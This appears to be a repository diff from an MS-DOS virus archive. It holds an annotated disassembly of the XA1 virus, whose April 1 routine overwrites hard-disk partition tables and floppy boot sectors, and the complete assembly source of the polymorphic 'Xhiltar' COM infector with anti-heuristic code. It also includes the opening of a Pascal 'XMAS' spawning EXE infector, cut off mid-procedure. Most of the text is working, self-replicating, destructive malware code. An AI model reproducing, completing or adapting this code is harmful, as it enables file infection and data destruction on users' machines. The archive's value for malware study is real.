06AC 68 74 65 6E 20 2E 2E 2E hten ...
06B4 0D 0A 07 00
;------------------------------------------
; write one sector to disk specified in DL
; track 9, side 0 sector 1
06B8 32F6 xor dh,dh
06BA B90100 mov cx,0001
06BD BB3706 mov bx,0637
06C0 B80103 mov ax,0301
06C3 CD13 int 13
06C5 C3 ret
;==================
; INT 24h handler
06C6 B000 mov al,00
06C8 CF iret
; table of bytes for changing encrypt routine
06C9 5E 00 0F 43
06CD 5E 30 0F 43
06D1 5E D2 07 43
06D5 76 00 0C 46
06D9 76 30 0C 46
06DD 76 D2 04 46
06E1 7E 00 0D 47
06E5 7E 30 0D 47
06E9 7E D2 05 47
; table for variants of decrypt routine
06ED 28 30 D2
; part of victime code
06F0 F3A4 rep movsb
06F2 8BF1 mov si,cx
06F4 8BF9 mov di,cx
06F6 C3 ret
06F7 0307 ; offset of buffer/modified code
06F9 DB63 ; file size + 256
06FB C603 ;
06FD 0306 ;
06FF 0060 ; file date
0701 710E ; file time

909
MSDOS/Virus.MSDOS.Unknown.xa1.lst Normal file
View File

@ -0,0 +1,909 @@
;==============================================
; Virus XA1 isolated in Poland in June 1991
;
; disassembled by Andrzej Kadlof July 1991
;
; (C) Polish Section of Virus Information Bank
;==============================================
; virus entry point
0100 EB07 jmp 0109
0102 56 0A 03 59 00 ; first 7 bytes forms virus signature
0107 2A 00 ; generation counter, never used (?)
; prepare stack for tricks
; stack usage:
; [BP + 2] cleared but not used
; [BP + 0] offset in block
; [BP - 2] low byte of size of decrypted part and encryption key
0109 0E push cs ; make free space on stack
010A E80000 call 010D ; put current offset on the stack
010D FA cli ; disable interrupt to safe stack
010E 8BEC mov bp,sp
0110 58 pop ax
0111 32C0 xor al,al
0113 894602 mov [bp+02],ax ; corrupt debbuger return address ??
0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt
; encrypt virus code, this routine is changed in different virus copies
011B B9CE05 mov cx,05CE ; length of decrypted block
011E B08C mov al,8C ; 8C is changed!
0120 8846FF mov [bp-01],al
0123 8B5E00 mov bx,[bp] ; current position in block
; ^^ changed, possible 3 wariants:
; ..5E.. mov bx,[bp] versions 0, 1, 2
; ..76.. mov si,[bp] versions 3, 4, 5
; ..7E.. mov di,[bp] versions 6, 7, 8
0126 884EFE mov [bp-02],cl ; low byte of counter
0129 8A4EFF mov cl,[bp-01] ; encrypt key
012C D207 rol byte ptr [bx],cl ; byte manipulation
; ^^^^ changed, possible 9 wariants:
; 000F add byte ptr [bx],cl version 0
; 300F xor byte ptr [bx],cl version 1
; D2O7 rol byte ptr [bx],cl version 2
; 000C add byte ptr [si],cl version 3
; 300C xor byte ptr [si],cl version 4
; D204 rol byte ptr [si],cl version 5
; 000D add byte ptr [di],cl version 6
; 300D xor byte ptr [di],cl version 7
; D205 rol byte ptr [di],cl version 8
012E EB00 jmp 0130 ; short pause
0130 43 inc bx ; position in block
; ^^ changed, possible 3 wariants:
; 43 inc bx version 0, 1, 2
; 46 inc si version 3, 4, 5
; 47 inc di version 6, 7, 8
0131 8A4EFE mov cl,[bp-02] ; restore block size
0134 E2F0 loop 0126 ; offset is decrypted!
; encrypted part
0136 FB sti
; get address of curent DTA and store it on the stack
0137 B42F mov ah,2F
0139 CD21 int 21
013B 06 push es
013C 53 push bx
; get keyboard status bits
013D 33C0 xor ax,ax
013F 8ED8 mov ds,ax
0141 A01704 mov al,[0417]
0144 2410 and al,10 ; extract scroll lock state
0146 50 push ax ; store
0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
; restore DS
014C 8CC8 mov ax,cs
014E 8ED8 mov ds,ax
; intercepte INT 24h
0150 BAC606 mov dx,06C6
0153 B82425 mov ax,2524 ; set interrupt vector
0156 CD21 int 21
; search for PATH= in environment block
0158 A12C00 mov ax,[002C] ; segment of environment block
015B 8EC0 mov es,ax
015D 33FF xor di,di ; begin of environment block
015F FC cld
0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
0164 741D je 0183 ; end fo block
0166 BE1B05 mov si,051B ; offset of string 'PATH='
0169 B90500 mov cx,0005 ; length of string
016C 8BC7 mov ax,di ; starting address
016E F3A6 rep cmpsb ; compare
0170 7411 je 0183 ; found
0172 8BF8 mov di,ax ; last starting point
0174 32C0 xor al,al
0176 B5FF mov ch,FF ; maximum block size
0178 F2AE repnz scasb
017A 74E4 je 0160
017C BF1A05 mov di,051A ; end of buffer for path
017F 8CC8 mov ax,cs ; restore ES
0181 8EC0 mov es,ax
0183 C706C1056205 mov word ptr [05C1],0562
; set local DTA
0189 BA3605 mov dx,0536
018C B41A mov ah,1A ; set DTA
018E CD21 int 21
0190 A1F906 mov ax,[06F9]
0193 A3F706 mov [06F7],ax
0196 A1FD06 mov ax,[06FD]
0199 A3FB06 mov [06FB],ax
019C B90500 mov cx,0005 ; counter of potential victims
019F BA1505 mov dx,0515 ; '*.COM', 0
01A2 06 push es
01A3 57 push di
01A4 51 push cx
01A5 8CC8 mov ax,cs
01A7 8EC0 mov es,ax
01A9 B9FFFF mov cx,FFFF ; all possible attributes
01AC B44E mov ah,4E ; find first
01AE EB06 jmp 01B6
01B0 59 pop cx ; restore counter
01B1 E35B jcxz 020E ; limit reached, check show/destruction
01B3 B44F mov ah,4F ; find next
01B5 51 push cx ; store counter
01B6 CD21 int 21
01B8 7203 jb 01BD ; continue
01BA E9F100 jmp 02AE
; restore address of path in environment block
01BD 59 pop cx
01BE 5F pop di
01BF 07 pop es
01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
01C4 744A je 0210 ; yes
; copy path to buffer
01C6 BB6205 mov bx,0562 ; offset of buffer
01C9 268A05 mov al,es:[di] ; next character
01CC 0AC0 or al,al ; end of block?
01CE 740A je 01DA ; yes
01D0 47 inc di
01D1 3C3B cmp al,3B ; ';', end of path?
01D3 7405 je 01DA ; yes
01D5 8807 mov [bx],al ; copy character
01D7 43 inc bx ; increase pointer
01D8 EBEF jmp 01C9 ; get next character
01DA 81FB6205 cmp bx,0562 ; buffer not empty?
01DE 74E0 je 01C0 ; empty
01E0 8A47FF mov al,[bx-01]
01E3 3C3A cmp al,3A ; ':', root directory
01E5 7408 je 01EF ; yes
01E7 3C5C cmp al,5C ; check last character, '\'
01E9 7404 je 01EF ; there is
01EB C6075C mov byte ptr [bx],5C ; add '\'
01EE 43 inc bx ; pointer to last character
01EF 06 push es
01F0 57 push di
01F1 51 push cx
01F2 891EC105 mov [05C1],bx ; store it
01F6 8BF3 mov si,bx
01F8 81EB6205 sub bx,0562 ; find path length
01FC 8BCB mov cx,bx
01FE BF1405 mov di,0514 ; destination buffer
0201 8CC8 mov ax,cs ; restore ES
0203 8EC0 mov es,ax
0205 4E dec si
0206 FD std
0207 F3A4 rep movsb ; copy
0209 8BD7 mov dx,di
020B 42 inc dx
020C EB97 jmp 01A5 ; find first
; end of infection proces, check condition for destruction/show
020E 58 pop ax ; balance stack
020F 58 pop ax
0210 8CC8 mov ax,cs ; restore ES
0212 8EC0 mov es,ax
; get date
0214 B42A mov ah,2A ; get date
0216 CD21 int 21
0218 81FA0104 cmp dx,0401 ; April 1?
021C 7533 jne 0251 ; no
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
; copy partition table to sector 11h of side 0, track 0
021E BA8000 mov dx,0080 ; first hard drive
0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
0224 BB0307 mov bx,0703 ; destroy victim code
0227 B80102 mov ax,0201 ; read 1 sector
022A 52 push dx
022B 51 push cx
022C 53 push bx
022D CD13 int 13 ; disk I/O
022F 5B pop bx
0230 59 pop cx
0231 5A pop dx
0232 B111 mov cl,11 ; new place for partition table
0234 B80103 mov ax,0301 ; write partition table
0237 CD13 int 13
; set and of sector marker in the buffer
0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker
; overwrite partition table
023F B280 mov dl,80
0241 E87404 call 06B8 ; write one sector to disk
; overwrite boot sector of drive A:
0244 32D2 xor dl,dl
0246 E86F04 call 06B8 ; write one sector do disk
; overwrite boot sector of drive B:
0249 B201 mov dl,01
024B E86A04 call 06B8 ; write disk
024E EB0A jmp 025A
0250 90 nop
; compare date
0251 81FA180C cmp dx,0C18 ; december 24?
0255 7203 jb 025A ; date earlier
;<><><><<><><><><><><><><><><><><><><><>
;
; CHRISTMAS SHOW
;
; see the description of subroutine 05D7
;<><><><><><><><><><><><><><><><><><><><><>
0257 E87D03 call 05D7 ; drow christmas tree
; make sound
025A E440 in al,40
025C 3CF8 cmp al,F8
025E 7206 jb 0266
0260 E461 in al,61
0262 0C03 or al,03
0264 E661 out 61,al
; restore the state of scroll lock flag
0266 33C0 xor ax,ax
0268 8ED8 mov ds,ax
026A 58 pop ax
026B 08061704 or [0417],al
; restore INT 24h
026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
0279 B82425 mov ax,2524 ; set interrupt vector
027C CD21 int 21
; restore DTA
027E 5A pop dx
027F 1F pop ds
0280 B41A mov ah,1A ; set DTA
0282 CD21 int 21
; restore DS
0284 8CC8 mov ax,cs
0286 8ED8 mov ds,ax
0288 BEF006 mov si,06F0
028B 8B3EF706 mov di,[06F7]
028F 033EFB06 add di,[06FB]
0293 57 push di
0294 B90700 mov cx,0007
0297 FC cld
0298 F3A4 rep movsb
029A 33C0 xor ax,ax
029C 8BD8 mov bx,ax
029E 8BD0 mov dx,ax
02A0 8BE8 mov bp,ax
02A2 8B36F706 mov si,[06F7]
02A6 BF0001 mov di,0100
02A9 8B0EFB06 mov cx,[06FB]
02AD C3 ret
02AE BE5405 mov si,0554 ; file name in FCB
02B1 8B3EC105 mov di,[05C1] ; address of destination
02B5 B90D00 mov cx,000D ; length of asciiz string
02B8 FC cld
02B9 F3A4 rep movsb ; copy
02BB BF2005 mov di,0520 ; buffer for file name
02BE E8FA01 call 04BB ; copy
02C1 7503 jne 02C6
02C3 E9EAFE jmp 01B0 ; find next/destruct/show
02C6 BF2B05 mov di,052B
02C9 E8EF01 call 04BB ; copy file name
02CC 7503 jne 02D1
02CE E9DFFE jmp 01B0 ; find next/destruct/show
02D1 C606610500 mov byte ptr [0561],00
02D6 90 nop
02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
02DC 740F je 02ED ; hiden, system or read only, open file
02DE BA6205 mov dx,0562 ; file name
02E1 33C9 xor cx,cx ; clear all attributes
02E3 B80143 mov ax,4301 ; set file attributes
02E6 CD21 int 21
02E8 7303 jnb 02ED ; open file
02EA E9C3FE jmp 01B0 ; find next/destruct/show
02ED BA6205 mov dx,0562
02F0 B8023D mov ax,3D02 ; open file for read/write
02F3 CD21 int 21
02F5 8BD8 mov bx,ax ; handle
02F7 7303 jnb 02FC
02F9 E9B4FE jmp 01B0 ; find next
; check file size
02FC A15205 mov ax,[0552] ; high word of file size in DTA
02FF 0BC0 or ax,ax
0301 7403 je 0306 ; file below 64K
0303 E99001 jmp 0496 ; close file and find next
0306 A15005 mov ax,[0550] ; lower word of file size
0309 3D0700 cmp ax,0007 ; minimum file size
030C 72F5 jb 0303 ; close file and find next
030E 3D00F8 cmp ax,F800 ; maximum file size
0311 73F0 jnb 0303 ; close file and find next
; mayby already infected?
0313 8B16F706 mov dx,[06F7] ; form address of bufer
0317 0316FB06 add dx,[06FB]
031B B90700 mov cx,0007 ; number of bytes
031E 52 push dx
031F 51 push cx
0320 B43F mov ah,3F ; read file
0322 CD21 int 21
0324 59 pop cx
0325 5E pop si
0326 7208 jb 0330 ; read error, close and find next
; compare first 7 bytes with own code
0328 BF0001 mov di,0100 ; destination
032B FC cld
032C F3A6 rep cmpsb
032E 7503 jne 0333
0330 E96301 jmp 0496 ; close file and find next, (infected!)
; get and store file date and time
0333 B80057 mov ax,5700 ; get file time stamp
0336 CD21 int 21
0338 72F6 jb 0330 ; close file, find next
033A 89160107 mov [0701],dx ; store date
033E 890EFF06 mov [06FF],cx ; store time
0342 C606610501 mov byte ptr [0561],01
0347 90 nop
; check file size, if less than 603h bytes then append some garbage
0348 A15005 mov ax,[0550] ; file size
034B 3D0306 cmp ax,0603
034E 7321 jnb 0371
; file length is less than 603h, add some garbage
0350 33D2 xor dx,dx
0352 33C9 xor cx,cx
0354 B80242 mov ax,4202 ; move file ptr to EOF
0357 CD21 int 21
0359 7303 jnb 035E ; no errors, continue
035B E93801 jmp 0496 ; close file and find next
035E B90306 mov cx,0603 ; number of bytes
0361 2B0E5005 sub cx,[0550] ; file size
0365 B440 mov ah,40 ; write file
0367 CD21 int 21
0369 B80306 mov ax,0603 ; new file size
036C 7303 jnb 0371
036E E92501 jmp 0496 ; close file and find next
; now file is at least 603h bytes long
0371 FEC4 inc ah
0373 A3F906 mov [06F9],ax ; oryginal file size + 256
0376 A15005 mov ax,[0550] ; file size
0379 BE0306 mov si,0603 ; virus length
037C 33FF xor di,di
037E 3BC6 cmp ax,si
0380 7302 jnb 0384
0382 8BF0 mov si,ax
0384 8936FD06 mov [06FD],si
0388 8BD7 mov dx,di
038A 33C9 xor cx,cx
038C B80042 mov ax,4200 ; move file ptr to BOF
038F CD21 int 21
0391 7303 jnb 0396
0393 E90001 jmp 0496 ; close file and find next
0396 8B16F706 mov dx,[06F7]
039A 0316FB06 add dx,[06FB]
039E B90002 mov cx,0200
03A1 3BF1 cmp si,cx
03A3 7302 jnb 03A7
03A5 8BCE mov cx,si ; number of bytes
03A7 52 push dx
03A8 51 push cx
03A9 B43F mov ah,3F ; read file
03AB CD21 int 21
03AD 59 pop cx
03AE 5A pop dx
03AF 7303 jnb 03B4 ; continue
03B1 E9E200 jmp 0496 ; close file and find next
03B4 52 push dx
03B5 51 push cx
03B6 33D2 xor dx,dx
03B8 33C9 xor cx,cx
03BA B80242 mov ax,4202 ; move file ptr to EOF
03BD CD21 int 21
03BF 59 pop cx
03C0 5A pop dx
03C1 7303 jnb 03C6 ; continue
03C3 E9D000 jmp 0496 ; close file and find next
03C6 B440 mov ah,40 ; write file
03C8 CD21 int 21
03CA 7303 jnb 03CF
03CC E9C700 jmp 0496 ; close file and find next
03CF 81C70002 add di,0200
03D3 81EE0002 sub si,0200
03D7 7602 jbe 03DB
03D9 EBAD jmp 0388
03DB FF060701 inc word ptr [0107] ; infection counter
03DF 33D2 xor dx,dx
03E1 33C9 xor cx,cx
03E3 B80042 mov ax,4200 ; move file ptr to BOF
03E6 CD21 int 21
03E8 7303 jnb 03ED
03EA E9A900 jmp 0496 ; close file and find next
03ED 53 push bx ; store handle
03EE E440 in al,40
03F0 A807 test al,07
03F2 74FA je 03EE
03F4 A21F01 mov [011F],al ; change decryption key
; get random number from system timer count
03F7 33C0 xor ax,ax
03F9 8AF8 mov bh,al
03FB 8ED8 mov ds,ax
03FD A06C04 mov al,[046C] ; timer, low byte
0400 8CCA mov dx,cs ; restore DS
0402 8EDA mov ds,dx
; generate rundom number in BX in the range 0..8
0404 B103 mov cl,03
0406 F6F1 div cl ; AL <- AL/3, AH <- remainder
0408 8AEC mov ch,ah ; store remainder (0, 1 or 2)
040A 32E4 xor ah,ah ; prepare division
040C F6F1 div cl ; AL <- AL / 9, AH <- remainder
040E 8AC4 mov al,ah ; AL <- second remainder
0410 02C0 add al,al ; *2, AL in [0..4]
0412 02C4 add al,ah ; *3, AL in [0..6]
0414 02C5 add al,ch ; first remainder
0416 8AD8 mov bl,al ; BL in [0..8]
; multiply BX by 4 (table entry size)
0418 03DB add bx,bx
041A 03DB add bx,bx
041C 81C3C906 add bx,06C9 ; offset of table
; modify encryption routine (automodyfication)
0420 8A07 mov al,[bx]
0422 A22401 mov [0124],al ; 3 versions 5E/76/7E
0425 8B4701 mov ax,[bx+01]
0428 A32C01 mov [012C],ax ; 9 wersions
042B 8A4703 mov al,[bx+03] ; 3 versions
042E A23001 mov [0130],al
0431 8AC5 mov al,ch
; prepare decrypt routine
0433 BBED06 mov bx,06ED
0436 D7 xlat
0437 A26104 mov [0461],al ; modify decryption routine
; write new encryption routine to file
043A 5B pop bx ; restore handle
043B BA0001 mov dx,0100 ; begin of file
043E B93500 mov cx,0035 ; block size
0441 B440 mov ah,40 ; write file
0443 CD21 int 21
0445 724F jb 0496 ; close file and find next
; decryption routine
0447 BE3501 mov si,0135 ; start of decrypted block
044A B9CE05 mov cx,05CE ; size of decrypted block
044D 53 push bx ; store handle
044E 51 push cx
044F B80002 mov ax,0200
0452 8B1EF706 mov bx,[06F7]
0456 031EFB06 add bx,[06FB]
045A 53 push bx
045B 8A0E1F01 mov cl,[011F] ; decription key
045F 8A2C mov ch,[si]
0461 D2CD ror ch,cl ; <-- changed (3 variants)
; ^^ changed byte, possible wariants:
; 28CD sub ch,cl versions: 0, 3, 6
; 30CD xor ch,cl versions: 1, 4, 7
; D2CD ror ch,cl versions: 2, 5, 8
0463 882F mov [bx],ch
0465 43 inc bx
0466 46 inc si
0467 48 dec ax
0468 75F5 jne 045F
046A 5A pop dx
046B 59 pop cx
046C 5B pop bx
046D 51 push cx
046E 81F90102 cmp cx,0201
0472 7203 jb 0477
0474 B90002 mov cx,0200
0477 B440 mov ah,40 ; write file
0479 CD21 int 21
047B 59 pop cx
047C 7218 jb 0496 ; close file and find next
047E 81E90002 sub cx,0200
0482 77C9 ja 044D
; restore file time stamp
0484 8B160107 mov dx,[0701] ; file date
0488 8B0EFF06 mov cx,[06FF] ; file time
048C B80157 mov ax,5701 ; set file time stamp
048F CD21 int 21
0491 7203 jb 0496 ; close file and find next
; decrease counter on the stack
0493 59 pop cx
0494 49 dec cx
0495 51 push cx
0496 B43E mov ah,3E ; close file
0498 CD21 int 21
049A 8A0E4B05 mov cl,[054B] ; attributes
049E FE0E6105 dec byte ptr [0561]
04A2 7405 je 04A9
04A4 F6C107 test cl,07 ; hidden, system, read only
04A7 740F je 04B8
04A9 80F920 cmp cl,20 ; archive
04AC 740A je 04B8
04AE BA6205 mov dx,0562 ; file name
04B1 32ED xor ch,ch
04B3 B80143 mov ax,4301 ; set file attributes
04B6 CD21 int 21
04B8 E9F5FC jmp 01B0 ; find next
;----------------------------------------
; move 11 bytes do DS:DI ('C:\COMMAND.')
04BB BE6205 mov si,0562
04BE B90B00 mov cx,000B
04C1 FC cld
04C2 F3A6 rep cmpsb
04C4 C3 ret
; buffer for path
04C5 30 31 32 33 34 35 36 37 01234567
04CD 38 39 30 31 32 33 34 35 89012345
04D5 36 37 38 39 30 31 32 33 67890123
04DD 34 35 36 37 38 39 30 31 45678901
04E5 32 33 34 35 36 37 38 39 23456789
04ED 30 31 32 33 34 35 36 37 01234567
04F5 38 39 30 31 32 33 34 35 89012345
04FD 36 37 38 43 3A 5C 4A 45 678C:\JE
0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P
050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\
; paterns for search
0515 2A 2E 43 4F 4D 00 50 41 *.COM PA
051D 54 48 3D TH=
; buffers for file names
0520 49 42 4D 42 49 IBMBI
0525 4F 2E 43 4F 4D 00 O.COM
052B 49 42 IB
052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM
0535 00
; local DTA
0536 03 3F 3F 3F 3F 3F 3F ;\
053D 3F 3F 43 4F 4D FF 02 00 ; | reserved
0545 00 00 00 00 00 00 ;/
054B 20 ; file attribute
054C 00 60 71 0E ; file time stamp
0550 DB 62 00 00 ; file size
0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0)
0561 01 ; flag: attributes are changed
0562 43 3A 5C C:\
0565 43 4F 4D 4D 41 4E 44 2E COMMAND.
056D 43 4F 4D 00 00 4D 00 00 COM M
0575 00 2E 43 4F 4D 00 4F 68 .COM Oh
057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo
059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh
05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo!
05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN
05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O
05BD 68 4E 6F 21 hNo!
05C1 65 05 ;
;---------------------------------------
; write character (or space) cx times
05C3 B020 mov al,20
05C5 50 push ax
05C6 E89E00 call 0667 ; write character
05C9 58 pop ax
05CA E2F9 loop 05C5
05CC C3 ret
;-------------
; next line
05CD B00D mov al,0D
05CF E89500 call 0667 ; write character
05D2 B00A mov al,0A
05D4 E99000 jmp 0667 ; write character
;------------------------------
; drow christmast tree
;
; result will look like this:
;
;
; ­
; ***
; *****
; *******
; *********
; ***********
; *************
; ***************
; *****************
; *******************
; *********************
; ***********************
; *************************
; ***************************
; *****************************
; ÛÛÛ
; ÛÛÛ
; ÛÛÛ
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
; Und er lebt doch noch : Der Tannenbaum !
; Frohe Weihnachten ...
;
05D7 B92700 mov cx,0027
05DA E8E6FF call 05C3 ; clear 39 characters
05DD B0AD mov al,AD ; '­'
05DF E88500 call 0667 ; write character
05E2 E8E8FF call 05CD ; new line
05E5 BB0300 mov bx,0003
05E8 BA2600 mov dx,0026
05EB 8BCA mov cx,dx
05ED E8D3FF call 05C3 ; write CX spaces
05F0 8BCB mov cx,bx
05F2 B02A mov al,2A ; '*'
05F4 E8CEFF call 05C5 ; write CX characters
05F7 E8D3FF call 05CD ; new line
05FA 4A dec dx
05FB 83C302 add bx,0002
05FE 83FB1F cmp bx,001F
0601 75E8 jne 05EB
0603 BB0300 mov bx,0003
0606 B92600 mov cx,0026
0609 E8B7FF call 05C3 ; write CX spaces
060C B90300 mov cx,0003
060F B0DB mov al,DB ; 'Û'
0611 E8B1FF call 05C5 ; write CX characters
0614 E8B6FF call 05CD ; next line
0617 4B dec bx
0618 75EC jne 0606
061A B95000 mov cx,0050 ; full line
061D B0CD mov al,CD ; 'Í'
061F E8A3FF call 05C5 ; write character CX times
0622 B91300 mov cx,0013
0625 E89BFF call 05C3 ; write CX spaces
0628 BB7406 mov bx,0674 ; string: Und er lebt doch ...
062B E82C00 call 065A ; write string
062E B91D00 mov cx,001D
0631 E88FFF call 05C3 ; clear part of line
0634 EB24 jmp 065A ; write asciiz string pointed by BX
0636 90 nop
0637 E80000 call 063A
063A 5B pop bx
063B 83C30D add bx,000D
063E 8CC8 mov ax,cs
0640 8ED8 mov ds,ax
0642 E81500 call 065A ; write string
0645 EBFE jmp 0645 ; hang CPU
0647 41 70 72 69 6C 2C 20 41 April, A
064F 70 72 69 6C 20 2E 2E 2E pril ...
0657 20 07 00
;-----------------------------------
; write asciiz string pointed by BX
065A 8A07 mov al,[bx] ; get character
065C 43 inc bx ; next character
065D 0AC0 or al,al ; and of string?
065F 7405 je 0666 ; yes, RET
0661 E80300 call 0667 ; write character
0664 EBF4 jmp 065A ; get next character
0666 C3 ret
;--------------------
; write character TTL
0667 52 push dx
0668 51 push cx
0669 53 push bx
066A 32FF xor bh,bh
066C B40E mov ah,0E
066E CD10 int 10
0670 5B pop bx
0671 59 pop cx
0671 59 pop cx
0672 5A pop dx
0673 C3 ret
0674 55 6E 64 20 65 72 20 6C Und er l
067C 65 62 74 20 64 6F 63 68 ebt doch
0684 20 6E 6F 63 68 20 3A 20 noch :
068C 44 65 72 20 54 61 6E 6E Der Tann
0694 65 6E 62 61 75 6D 20 21 enbaum !
069C 0D 0A 00 46 72 6F 68 65 Frohe
06A4 20 57 65 69 68 6E 61 63 Weihnac
06AC 68 74 65 6E 20 2E 2E 2E hten ...
06B4 0D 0A 07 00
;------------------------------------------
; write one sector to disk specified in DL
; track 9, side 0 sector 1
06B8 32F6 xor dh,dh
06BA B90100 mov cx,0001
06BD BB3706 mov bx,0637
06C0 B80103 mov ax,0301
06C3 CD13 int 13
06C5 C3 ret
;==================
; INT 24h handler
06C6 B000 mov al,00
06C8 CF iret
; table of bytes for changing encrypt routine
06C9 5E 00 0F 43
06CD 5E 30 0F 43
06D1 5E D2 07 43
06D5 76 00 0C 46
06D9 76 30 0C 46
06DD 76 D2 04 46
06E1 7E 00 0D 47
06E5 7E 30 0D 47
06E9 7E D2 05 47
; table for variants of decrypt routine
06ED 28 30 D2
; part of victime code
06F0 F3A4 rep movsb
06F2 8BF1 mov si,cx
06F4 8BF9 mov di,cx
06F6 C3 ret
06F7 0307 ; offset of buffer/modified code
06F9 DB63 ; file size + 256
06FB C603 ;
06FD 0306 ;
06FF 0060 ; file date
0701 710E ; file time

151
MSDOS/Virus.MSDOS.Unknown.xhiltar.asm Normal file
View File

@ -0,0 +1,151 @@
; The Xhiltar Virus
; By Arsonic[Codebreakers]
; Type: Runtime Appending Com Infector
; Encrypted: Yes
; Polymorphic: Yes
; Time/Date: Yes
; add Attrib: Yes
; Changes Directory's: Yes (dotdot method)
; Anti-Anti-Virus: Yes (anti-heuristics)
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;fuck up those heristics!
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
lea si,[bp+hidden_start]
mov di,si
mov cx,end - hidden_start
call encryption
jmp hidden_start
value db 0
encryption: ;encryption routine
call poly
encrypt:
lodsb ;1
_1stDummy:
nop ;1 = +1
xor al,byte ptr[bp+value] ;4
_2ndDummy:
nop ;1 = +6
stosb ;1
_3rdDummy:
nop ;1 = +8
loop encrypt ;2
_4thDummy:
nop ;1 = +11
ret
hidden_start:
mov cx,3
mov di,100h ;restore the first 3 bytes
lea si,[bp+buff]
rep movsb
find_first: ;find first file
mov ah,4eh
find_next:
lea dx,[bp+filemask]
xor cx,cx ;with 0 attrib's..
int 21h
jnc infect
close:
push 100h
ret
infect:
mov ax,3d02h ;open file
mov dx,9eh
int 21h
xchg bx,ax
mov ax,5700h ;get time/date
int 21h
push dx ;save the values
push cx
in al,40h ;get new encrypt value from system clock
mov byte ptr [bp+value],al
mov ah,3fh ;read 3 bytes from the file.. too
mov cx,3 ;be replaced with a jump to the virus
lea dx,[bp+buff]
int 21h
mov ax,word ptr [80h + 1ah] ;check for infect
sub ax,end - start + 3
cmp ax,word ptr[bp+buff+1]
je close_file
mov ax,word ptr[80h + 1ah]
sub ax,3
mov word ptr[bp+three+1],ax
mov ax,4200h ;goto start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the 3 byte jump
lea dx,[bp+three]
mov cx,3
int 21h
mov ax,4202h ;goto end of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the unencrypted area
lea dx,[bp+start]
mov cx,hidden_start - start
int 21h
lea si,[bp+hidden_start] ;encrypt the virus
lea di,[bp+end]
mov cx,end - hidden_start
call encryption
mov ah,40h ;write encrypted area
lea dx,[bp+end]
mov cx,end - hidden_start
int 21h
close_file:
mov ax,5701h ;restore time/date
pop cx ;with saved values
pop dx
int 21h
mov ah,3eh ;close file
int 21h
mov ah,4Fh ;find next file
jmp find_next
poly:
call random ;get random value
mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt
call random
mov [bp+_2ndDummy],dl
call random
mov [bp+_3rdDummy],dl
call random
mov [bp+_4thDummy],dl
ret
garbage:
nop ; no operation instruction
clc ; Clear Carry
stc ; Set Carry
sti ; Set Interuppt Flag
cld ; Clear Direction Flag
cbw ; Convert byte to word
inc dx ; increase dx
dec dx ; decrease dx
lahf ; loads AH with flags
random:
in ax,40h
and ax,7
xchg bx,ax
add bx,offset garbage
add bx,bp
mov dl,[bx]
ret
filemask db '*.com',0
three db 0e9h,0,0
buff db 0cdh,20h,0
dotdot db '..',0
author db 'Arsonic[Codebreakers]',13,10,'$'
virus db 'the XHiLTAR virus',13,10,'$'
db 'I LOVE U LISA',13,10,'$'
db 'I LOVE U SOOOO MUCH!',13,10,'$'
end:

179
MSDOS/Virus.MSDOS.Unknown.xmas.pas Normal file
View File

@ -0,0 +1,179 @@
{
XMAS Virus, a non-resident spawning .EXE infector by Glenn Benton
To be compiled with Turbo Assembler 6.0
Files required : XMAS.PAS - Viral part (this one)
XMAS.OBJ - Music data (composed by myself!)
PLAYIT.TPU - Music player engine
Set the environment variables for different effects :
SET XMAS=YES (Disable virus)
SET XMAS=TST (Plays the music only)
SET XMAS=DEL (Deletes the virus when a program is started)
The compiled virus example is compressed and uses 6888 bytes...
On 25th and 26th the virus activates, playing the music and
wishes you a merry X-mas (nice of me, isn't it?)
}
Program Xmas;
{$M 4096,0,512}
Uses Crt, Dos, Playit;
Label StartOrig;
Var
Year, Month, Day, DayOfWeek : Word;
DirInfo : SearchRec;
ComSeek : SearchRec;
FileFound : Boolean;
FileName : String;
Parameters : String;
OrigName : String;
P : Byte;
ExtHere : Boolean;
Teller : Word;
StopChar : Char;
FromF : File;
{Dit is de data van het te spelen liedje}
{$L XMAS.OBJ}
Procedure Christmas; EXTERNAL;
{Deze routine wordt aangeroepen als het 25 of 26 december is}
Procedure Active;
Begin;
StopChar := #0;
ClrScr;
GotoXY(32,5);
WriteLn('Merry Christmas');
GotoXY(38,7);
WriteLn('and');
GotoXY(31,9);
WriteLn('A Happy New Year!');
GotoXy(31,11);
WriteLn('Wished To You By:');
GotoXy(34,17);
WriteLn('Glenn Benton');
GotoXy(27,24);
WriteLn('Press any key to continue');
Repeat
